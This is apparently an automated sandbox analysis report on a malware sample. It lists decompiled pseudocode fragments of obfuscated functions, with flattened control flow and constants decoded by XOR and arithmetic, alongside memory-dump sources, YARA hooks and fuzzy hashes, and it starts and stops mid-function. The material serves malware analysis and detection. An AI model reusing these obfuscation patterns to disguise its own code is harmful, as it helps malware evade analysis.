							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E00236228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}





























                                                      0x0023e05a
                                                      0x0023e05d
                                                      0x0023e065
                                                      0x0023e075
                                                      0x0023e07b
                                                      0x0023e07f
                                                      0x0023e081
                                                      0x0023e089
                                                      0x0023e091
                                                      0x0023e099
                                                      0x0023e0a1
                                                      0x0023e0af
                                                      0x0023e0b4
                                                      0x0023e0ba
                                                      0x0023e0c2
                                                      0x0023e0ca
                                                      0x0023e0d2
                                                      0x0023e0da
                                                      0x0023e0de
                                                      0x0023e0e3
                                                      0x0023e0e9
                                                      0x0023e0f1
                                                      0x0023e0f9
                                                      0x0023e101
                                                      0x0023e106
                                                      0x0023e10e
                                                      0x0023e11b
                                                      0x0023e11e
                                                      0x0023e122
                                                      0x0023e127
                                                      0x0023e12f
                                                      0x0023e137
                                                      0x0023e144
                                                      0x0023e148
                                                      0x0023e150
                                                      0x0023e15d
                                                      0x0023e15e
                                                      0x0023e162
                                                      0x0023e16a
                                                      0x0023e172
                                                      0x0023e180
                                                      0x0023e184
                                                      0x0023e18c
                                                      0x0023e194
                                                      0x0023e198
                                                      0x0023e19e
                                                      0x0023e21c
                                                      0x00000000
                                                      0x0023e1a6
                                                      0x0023e1a6
                                                      0x0023e215
                                                      0x0023e215
                                                      0x0023e21a
                                                      0x00000000
                                                      0x00000000
                                                      0x0023e1c1
                                                      0x0023e1c3
                                                      0x0023e1c7
                                                      0x0023e1c9
                                                      0x0023e227
                                                      0x00000000
                                                      0x0023e227
                                                      0x0023e1d0
                                                      0x0023e1d2
                                                      0x0023e20c
                                                      0x0023e20c
                                                      0x0023e20e
                                                      0x0023e210
                                                      0x00000000
                                                      0x00000000
                                                      0x0023e1d6
                                                      0x0023e1e0
                                                      0x0023e1e0
                                                      0x0023e1d8
                                                      0x0023e1d8
                                                      0x0023e1d8
                                                      0x0023e1f4
                                                      0x0023e1f9
                                                      0x0023e1fc
                                                      0x0023e1fe
                                                      0x00000000
                                                      0x0023e200
                                                      0x0023e200
                                                      0x0023e204
                                                      0x0023e207
                                                      0x0023e209
                                                      0x0023e209
                                                      0x00000000
                                                      0x0023e209
                                                      0x0023e1fe
                                                      0x0023e212
                                                      0x0023e212
                                                      0x0023e212
                                                      0x00000000
                                                      0x0023e215

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &L$;)m$TB7f
                                                      • API String ID: 0-1597752287
                                                      • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                                      • Instruction ID: fa31acec404a8216b554892dab6a4be05f361feabb4f6c10052834ab44828899
                                                      • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                                      • Instruction Fuzzy Hash: 3351A9B16183028FD718CF25C88592BBBE1FFD4358F104A1DF899962A0D774DA5ACF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002461B8, Relevance: 3.8, Strings: 3, Instructions: 77COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E002461B8(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				void* _t68;
				void* _t69;
				signed int _t71;
				void* _t75;
				void* _t76;
				signed int* _t78;

				_t78 =  &_v24;
				_v12 = 0x5dfc;
				_v12 = _v12 * 0x23;
				_t69 = __ecx;
				_v12 = _v12 << 7;
				_t75 = 0;
				_v12 = _v12 ^ 0x066cb215;
				_t76 = 0x1b4ca438;
				_v24 = 0xd6f7;
				_v24 = _v24 + 0xffffb773;
				_v24 = _v24 + 0xd9f1;
				_v24 = _v24 + 0xe528;
				_v24 = _v24 ^ 0x000200e6;
				_v16 = 0x64b4;
				_v16 = _v16 + 0xda3f;
				_v16 = _v16 >> 1;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000725d;
				_v4 = 0xc8c2;
				_v4 = _v4 | 0x9945d150;
				_v4 = _v4 + 0x9caf;
				_v4 = _v4 ^ 0x99461e9f;
				_v20 = 0xe019;
				_t71 = 0x46;
				_v20 = _v20 / _t71;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x00001f6d;
				_v8 = 0xf95b;
				_v8 = _v8 | 0x30645c78;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x3064d0a8;
				do {
					while(_t76 != 0x108726d) {
						if(_t76 == 0x1b4ca438) {
							_t76 = 0x2a486598;
							continue;
						} else {
							if(_t76 == 0x2a486598) {
								_push(_t71);
								_t68 = E00247F1B();
								_t78 =  &(_t78[1]);
								_t76 = 0x108726d;
								_t75 = _t75 + _t68;
								continue;
							}
						}
						goto L7;
					}
					_t71 = _v16;
					_t64 = E0023D64E(_t71, _v4, _v20, _t69 + 4, _v8);
					_t78 =  &(_t78[3]);
					_t76 = 0xee7d46d;
					_t75 = _t75 + _t64;
					L7:
				} while (_t76 != 0xee7d46d);
				return _t75;
			}
















                                                      0x002461b8
                                                      0x002461bb
                                                      0x002461ce
                                                      0x002461d2
                                                      0x002461d4
                                                      0x002461d9
                                                      0x002461db
                                                      0x002461e3
                                                      0x002461e8
                                                      0x002461f5
                                                      0x002461fd
                                                      0x00246205
                                                      0x0024620d
                                                      0x00246215
                                                      0x0024621d
                                                      0x00246225
                                                      0x00246229
                                                      0x0024622e
                                                      0x00246236
                                                      0x0024623e
                                                      0x00246246
                                                      0x0024624e
                                                      0x00246256
                                                      0x00246264
                                                      0x00246267
                                                      0x0024626b
                                                      0x00246270
                                                      0x00246275
                                                      0x0024627d
                                                      0x00246285
                                                      0x0024628d
                                                      0x00246295
                                                      0x0024629d
                                                      0x0024629d
                                                      0x002462ab
                                                      0x002462cb
                                                      0x00000000
                                                      0x002462ad
                                                      0x002462af
                                                      0x002462b9
                                                      0x002462ba
                                                      0x002462bf
                                                      0x002462c2
                                                      0x002462c7
                                                      0x00000000
                                                      0x002462c7
                                                      0x002462af
                                                      0x00000000
                                                      0x002462ab
                                                      0x002462df
                                                      0x002462e3
                                                      0x002462e8
                                                      0x002462eb
                                                      0x002462f0
                                                      0x002462f2
                                                      0x002462f2
                                                      0x00246303

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ($]r$x\d0
                                                      • API String ID: 0-3053701899
                                                      • Opcode ID: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                                      • Instruction ID: 1f8fcba8fd69887f545519e7eeafc9dda70281feda856bf47d7bce851a08123e
                                                      • Opcode Fuzzy Hash: 51c1d68f1b448b9cd01a0670611b7d4582907cb0fec310406faa2fe7817289f3
                                                      • Instruction Fuzzy Hash: FF3166B29083429FD348DE14D84941BBBE0BBD5718F004E5DF899A6265D3B9DE1C8B93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00240B68, Relevance: 3.8, Strings: 3, Instructions: 75COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E00240B68(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t76;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t76);
				_v16 = 0x6860;
				_v16 = _v16 * 0x5b;
				_v16 = _v16 ^ 0xdc6b4abd;
				_v16 = _v16 ^ 0xdc4e778c;
				_v32 = 0xa230;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x288c6565;
				_v8 = 0xfe44;
				_v8 = _v8 | 0x4c3583fb;
				_v8 = _v8 + 0xfffff685;
				_v8 = _v8 ^ 0x61a5c761;
				_v8 = _v8 ^ 0x2d906c10;
				_v40 = 0xe5db;
				_v40 = _v40 | 0x9b65f6ba;
				_v40 = _v40 ^ 0x9b65d356;
				_v20 = 0x9adf;
				_v20 = _v20 + 0x49d9;
				_v20 = _v20 + 0xffff68ea;
				_v20 = _v20 ^ 0x00005968;
				_v36 = 0x94a7;
				_v36 = _v36 ^ 0xf3da6fb3;
				_v36 = _v36 ^ 0xf3dae7d2;
				_v28 = 0xd25a;
				_v28 = _v28 + 0x1e41;
				_v28 = _v28 | 0x2f85fa9d;
				_v28 = _v28 ^ 0x2f85d3ee;
				_v12 = 0x5326;
				_v12 = _v12 ^ 0x0ede0c0e;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x01db8a0a;
				_v24 = 0x6b2;
				_v24 = _v24 << 4;
				_v24 = _v24 | 0x9aa17d8a;
				_t63 =  &_v24;
				_v24 = _v24 ^ 0x9aa13f42;
				_push(_v32);
				_t91 = E0024889D(0x24c0b0, _v16,  *_t63);
				E0023C680(__ecx, _v40, _v20, 0x24c0b0, _v36, _a12, _t79, _a4);
				return E00242025(_v28, _t91, _v12, _v24);
			}













                                                      0x00240b70
                                                      0x00240b75
                                                      0x00240b78
                                                      0x00240b7b
                                                      0x00240b7c
                                                      0x00240b7d
                                                      0x00240b82
                                                      0x00240b92
                                                      0x00240b95
                                                      0x00240b9c
                                                      0x00240ba3
                                                      0x00240baa
                                                      0x00240bae
                                                      0x00240bb5
                                                      0x00240bbc
                                                      0x00240bc3
                                                      0x00240bca
                                                      0x00240bd1
                                                      0x00240bd8
                                                      0x00240bdf
                                                      0x00240be6
                                                      0x00240bed
                                                      0x00240bf4
                                                      0x00240bfb
                                                      0x00240c02
                                                      0x00240c09
                                                      0x00240c10
                                                      0x00240c17
                                                      0x00240c1e
                                                      0x00240c25
                                                      0x00240c2c
                                                      0x00240c33
                                                      0x00240c3a
                                                      0x00240c41
                                                      0x00240c48
                                                      0x00240c4c
                                                      0x00240c50
                                                      0x00240c57
                                                      0x00240c5e
                                                      0x00240c62
                                                      0x00240c69
                                                      0x00240c69
                                                      0x00240c70
                                                      0x00240c7e
                                                      0x00240c96
                                                      0x00240cb3

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &S$`h$hY
                                                      • API String ID: 0-860638928
                                                      • Opcode ID: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
                                                      • Instruction ID: 5ac32dac8230f610ca4569d4ea37be3fff7344e570bf05e8cdbe1767aafc7ffa
                                                      • Opcode Fuzzy Hash: 745587b5455777c92b728403b0134296abb58848fb99311a233a1f2b9a5f3ad8
                                                      • Instruction Fuzzy Hash: A3312FB1C00209EBDF49CFA1C94A8EEBFB5FF44314F208198E41276260D3B94A65CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                      0x10007f0c
                                                      0x10007f1c

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                                      • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                                      • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                                      • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00245A61, Relevance: 2.7, Strings: 2, Instructions: 155COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00245A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00249AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002376F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00244F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00231C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}
























                                                      0x00245a6b
                                                      0x00245a72
                                                      0x00245a74
                                                      0x00245a7b
                                                      0x00245a82
                                                      0x00245a89
                                                      0x00245a8b
                                                      0x00245a90
                                                      0x00245a98
                                                      0x00245a9b
                                                      0x00245aa2
                                                      0x00245aaa
                                                      0x00245aaf
                                                      0x00245abc
                                                      0x00245acf
                                                      0x00245ad4
                                                      0x00245ada
                                                      0x00245ae2
                                                      0x00245aea
                                                      0x00245af7
                                                      0x00245afa
                                                      0x00245b06
                                                      0x00245b0e
                                                      0x00245b11
                                                      0x00245b15
                                                      0x00245b1d
                                                      0x00245b2a
                                                      0x00245b2e
                                                      0x00245b36
                                                      0x00245b3b
                                                      0x00245b43
                                                      0x00245b4b
                                                      0x00245b53
                                                      0x00245b5b
                                                      0x00245b63
                                                      0x00245b6b
                                                      0x00245b73
                                                      0x00245b7b
                                                      0x00245b83
                                                      0x00245b8b
                                                      0x00245b93
                                                      0x00245b9b
                                                      0x00245ba3
                                                      0x00245bab
                                                      0x00245bb3
                                                      0x00245bbb
                                                      0x00245bc0
                                                      0x00245bc8
                                                      0x00245bd5
                                                      0x00245bd9
                                                      0x00245be1
                                                      0x00245be9
                                                      0x00245bf1
                                                      0x00245bf9
                                                      0x00245c01
                                                      0x00245c05
                                                      0x00245c0d
                                                      0x00245c15
                                                      0x00245c1d
                                                      0x00245c25
                                                      0x00245c25
                                                      0x00245c33
                                                      0x00245cd1
                                                      0x00245cd6
                                                      0x00245cac
                                                      0x00245cb0
                                                      0x00245cb8
                                                      0x00000000
                                                      0x00245cb8
                                                      0x00245c3f
                                                      0x00245c9d
                                                      0x00245ca5
                                                      0x00000000
                                                      0x00245cab
                                                      0x00245c43
                                                      0x00000000
                                                      0x00245d11
                                                      0x00245c4f
                                                      0x00245c57
                                                      0x00000000
                                                      0x00245c5d
                                                      0x00245c5d
                                                      0x00000000
                                                      0x00245c5d
                                                      0x00245d1c
                                                      0x00245d1c
                                                      0x00245d1c
                                                      0x00245c76
                                                      0x00245c7b
                                                      0x00245c7d
                                                      0x00245c83
                                                      0x00245c89
                                                      0x00000000
                                                      0x00245c89
                                                      0x00000000
                                                      0x00245c83
                                                      0x00245cdb
                                                      0x00245ce0
                                                      0x00245cea
                                                      0x00245cf3
                                                      0x00000000
                                                      0x00245cec
                                                      0x00245cec
                                                      0x00000000
                                                      0x00245cec
                                                      0x00000000
                                                      0x00245cf5
                                                      0x00245cf5
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: 4.$gG
                                                      • API String ID: 2962429428-791606841
                                                      • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                                      • Instruction ID: 2567a7ca370f60bf7d3cf6f8f31f70096e5dd35a82fc2131f573d0a2262356e1
                                                      • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                                      • Instruction Fuzzy Hash: FB61AA715287429BD768CF24C88981FBBE0FFC4718F100A1DF5C6962A1D7B98A59CB87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023B112, Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0023B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x24ca2c; // 0x698300
							_t82 = _t97 + 0x230; // 0x7a0043
							return E00236636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00243E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00240ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}






















                                                      0x0023b118
                                                      0x0023b11f
                                                      0x0023b127
                                                      0x0023b12c
                                                      0x0023b134
                                                      0x0023b13c
                                                      0x0023b144
                                                      0x0023b149
                                                      0x0023b151
                                                      0x0023b162
                                                      0x0023b16b
                                                      0x0023b183
                                                      0x0023b188
                                                      0x0023b18e
                                                      0x0023b196
                                                      0x0023b19e
                                                      0x0023b1b3
                                                      0x0023b1b4
                                                      0x0023b1b8
                                                      0x0023b1c0
                                                      0x0023b1c8
                                                      0x0023b1d0
                                                      0x0023b1d8
                                                      0x0023b1e0
                                                      0x0023b1e5
                                                      0x0023b1ed
                                                      0x0023b1f5
                                                      0x0023b1fd
                                                      0x0023b205
                                                      0x0023b20d
                                                      0x0023b215
                                                      0x0023b223
                                                      0x0023b227
                                                      0x0023b233
                                                      0x0023b233
                                                      0x0023b239
                                                      0x0023b2ce
                                                      0x0023b2d8
                                                      0x00000000
                                                      0x0023b2e3
                                                      0x0023b241
                                                      0x0023b25b
                                                      0x0023b262
                                                      0x00000000
                                                      0x0023b262
                                                      0x0023b249
                                                      0x00000000
                                                      0x00000000
                                                      0x0023b24b
                                                      0x0023b24b
                                                      0x0023b266
                                                      0x0023b272
                                                      0x0023b27a
                                                      0x0023b294
                                                      0x0023b2a8
                                                      0x0023b2a8
                                                      0x0023b2ac
                                                      0x0023b2ae
                                                      0x00000000
                                                      0x00000000
                                                      0x0023b299
                                                      0x0023b29d
                                                      0x0023b2a5
                                                      0x0023b2a5
                                                      0x0023b2a5
                                                      0x00000000
                                                      0x0023b2a5
                                                      0x0023b29f
                                                      0x0023b29f
                                                      0x0023b29f
                                                      0x0023b2a3
                                                      0x0023b2b2
                                                      0x0023b2b5
                                                      0x0023b2b5
                                                      0x00000000
                                                      0x0023b2b5
                                                      0x00000000
                                                      0x0023b2a3
                                                      0x00000000
                                                      0x0023b2b7
                                                      0x0023b2b7
                                                      0x0023b2b7
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: B$W$
                                                      • API String ID: 0-584637061
                                                      • Opcode ID: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
                                                      • Instruction ID: e410bbd594e1358f32ae0a9c584c8ee4201e8a34bbb7f8da3b5803138acb5f51
                                                      • Opcode Fuzzy Hash: 44b181504879ea0d1ed24928566f6a986cfd210e4bee9c1ecd534ccc22b94645
                                                      • Instruction Fuzzy Hash: A24187B15183028BD715CF20D58955FBBE1FBC8758F104A1EF589662A0D7B48A5A8F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002431E2, Relevance: 2.6, Strings: 2, Instructions: 102COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E002431E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00231210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
